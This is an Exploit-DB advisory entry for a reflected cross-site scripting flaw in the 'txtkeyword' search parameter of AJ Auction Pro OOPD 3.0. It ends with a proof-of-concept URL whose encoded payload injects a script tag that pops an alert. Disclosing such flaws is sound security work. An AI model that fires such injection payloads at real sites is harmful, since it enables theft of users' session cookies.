AJ Auction Pro OOPD 3.0 - 'txtkeyword' Cross-Site Scripting

EDB-ID:

34642

CVE:

N/A




Platform:

PHP

Date:

2009-08-06


source: https://www.securityfocus.com/bid/43273/info

AJ Auction Pro OOPD is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

AJ Auction Pro OOPD 3.0 is vulnerable; other versions may be affected. 

http://www.example.com/ajauctionpro/oopdv3/index.php?do=search&type=&stime=&txtkeyword=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&id=all&button=Search&select2=all&select3=endsoon